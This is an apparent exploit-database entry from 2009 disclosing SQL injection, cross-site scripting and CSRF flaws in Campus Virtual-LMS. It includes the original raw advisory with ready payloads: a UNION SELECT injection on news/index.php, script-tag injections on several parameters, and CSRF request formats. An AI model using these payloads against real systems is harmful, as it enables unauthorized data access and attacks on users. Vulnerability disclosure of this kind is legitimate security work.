Campus Virtual-LMS

vendor:

Campus Virtual-LMS

by:

Yasión

4,3

CVSS

MEDIUM

SQLi, XSS, CSRF

89, 79, 352

CWE

Product Name: Campus Virtual-LMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

The Campus Virtual-LMS is vulnerable to SQL injection, Cross-Site Scripting and Cross-Site Request Forgery. The SQL injection vulnerability exists in the news/index.php file, which can be exploited by sending a maliciously crafted HTTP GET request with a negative value in the 'id' parameter. The Cross-Site Scripting vulnerability exists in the enrolments/step1.php and files/shared_list.php files, which can be exploited by sending a maliciously crafted HTTP GET request with a malicious JavaScript code in the 'courseid' and 'search' parameters respectively. The Cross-Site Request Forgery vulnerability exists in the login/logout.php and enrolments/step2.php files, which can be exploited by sending a maliciously crafted HTTP request with a malicious action and orderid parameters.

Mitigation:

Input validation should be used to prevent SQL injection, Cross-Site Scripting and Cross-Site Request Forgery attacks. The application should also use a secure authentication mechanism and session management.

Source

Exploit-DB raw data:

+-----------------------------------------------------------------------------+
LMS:   Campus Virtual-LMS
WEB:   http://campusvirtualcomputrade.cae.net

Autor: YasiÃ³n
Fecha: 12 jun 2009
+-----------------------------------------------------------------------------+

 -----------------------------------------------------------------------------+
 [+] SQLi
 -----------------------------------------------------------------------------+
   Archivo: news/index.php [no logged]
   GET: ?id
   InyecciÃ³n: -1 union select 1,2,3,4,5,6,7
 -----------------------------------------------------------------------------+

 -----------------------------------------------------------------------------+
 [+] XSS
 -----------------------------------------------------------------------------+
   Archivo: enrolments/step1.php [no logged]
   GET: ?courseid
   InyecciÃ³n: 1"><script>alert(/xD/.source)</script>

   Archivo: files/shared_list.php [logged]
   GET/POST: ?search
   InyecciÃ³n: "><script>alert(/xD/.source)</script><!--

   Archivo: files/shared_list.php [logged]
   GET: ?siteid
   InyecciÃ³n: "><script>alert(/xD/.source)</script><!--
 -----------------------------------------------------------------------------+

 -----------------------------------------------------------------------------+
 [+] CSRF
 -----------------------------------------------------------------------------+
   Archivo: login/logout.php
   Info: Desconecta al usuario mediante una imagen, un redireccionamiento, un
   link...

   Archivo: enrolments/step2.php
   GET: ?action=[ACTION]&orderid=[ORDERID]&courseid=[COURSEID]
   Info: AÃ±ade o elimina [ADD/DELETE] el curso identificado por COURSEID a la
   cesta identificada por ODERID.    SerÃa necesario conocer por adelantado la
   cesta del usuario. (No explotable)
 -----------------------------------------------------------------------------+

+-----------------------------------------------------------------------------+
Gretz: UnderSecurity.net
+-----------------------------------------------------------------------------+

# milw0rm.com [2009-06-12]